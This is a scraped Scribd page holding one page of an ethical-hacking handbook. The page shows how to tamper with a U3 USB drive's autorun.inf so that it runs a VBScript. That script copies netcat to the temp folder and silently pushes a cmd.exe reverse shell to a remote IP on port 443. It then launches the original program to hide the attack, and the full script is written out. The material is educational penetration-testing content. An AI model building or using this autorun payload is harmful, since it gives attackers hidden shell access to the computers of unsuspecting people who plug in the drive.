Thanks to visit codestin.com
Credit goes to www.scribd.com

Scribd
Upload
14 views1 page

Gray Hat Hacking 112

The document describes a method for modifying the autorun.inf file on a USB drive to execute a malicious script instead of the intended application. The script uses netcat to establish a command shell on a remote computer while maintaining the appearance of normal behavior. This technique demonstrates the potential for exploiting autorun features for unauthorized access.

Uploaded by

digapo7593
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
14 views1 page

Gray Hat Hacking 112

The document describes a method for modifying the autorun.inf file on a USB drive to execute a malicious script instead of the intended application. The script uses netcat to establish a command shell on a remote computer while maintaining the appearance of normal behavior. This technique demonstrates the potential for exploiting autorun features for unauthorized access.

Uploaded by

digapo7593
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 1

Gray Hat Hacking, The Ethical Hacker’s Handbook, Third Edition

84
Extracting the default autorun.inf file is simple and contains only a few directives.
In this example, we will replace the executable call with a script of our own. Our script
will perform an attack using netcat to push a command shell to a remote computer,
and then execute the originally specified program, LaunchU3.exe, so that the user won’t
notice any abnormal behavior when they plug the USB drive in. The unedited autorun.
inf file is as follows:
[AutoRun]
open=wscript LaunchU3.exe -a
icon=LaunchU3.exe,0
action=Run U3 Launchpad
[Definitions]
Launchpad=LaunchPad.exe
Vtype=2
[CopyFiles]
FileNumber=1
File1=LaunchPad.zip
[Update]
URL=http://u3.sandisk.com/download/lp_installer.asp?custom=1.6.1.2&brand=PelicanBFG
[Comment]
brand=PelicanBFG

For our purposes, we’ll only edit the second line of this file and change it from
open=wscript LaunchU3.exe -a

to
open=wscript cruzer/go.vbs

When the autorun.inf file is executed on insertion of the device, our go.vbs script
will run instead of the LaunchU3.exe application. We’ll put it in a directory called cru-
zer along with the netcat binary nc.exe in an attempt to make it slightly less noticeable
at a casual glance. Next we need to create our go.vbs script. Since we’re just demonstrat-
ing the technique, we’ll keep it very simple, as shown next. The script will copy the
netcat binary to the Windows temp directory and then execute the netcat command
with options to bind a cmd.exe command shell and pass it to a remote computer.
'This prevents the script from throwing errors in the event it has trouble
On Error Resume Next
set objShell = WScript.CreateObject("WScript.Shell")
'Get the location of the temp directory
temp=objShell.ExpandEnvironmentStrings("%temp%")
'Get the location of the Windows Directory
windir=objShell.ExpandEnvironmentStrings("%windir%")
set filesys=CreateObject("Scripting.FileSystemObject")
'Copy our netcat into the temp directory of the target
filesys.CopyFile "cruzer\nc.exe", temp & "\"
'Wait to make sure the operation completes
WScript.Sleep 5000
'Throw a command prompt to the waiting remote computer, a local test in this case.
'The 0 at the end of the line specifies that the command box NOT be displayed to
'the user.
objShell.Run temp & "\nc.exe -e " & windir & "\system32\cmd.exe 192.168.1.106
443",0
'Execute the application originally specified in the autorun.inf file
objShell.Run "LaunchU3.exe -a"

You might also like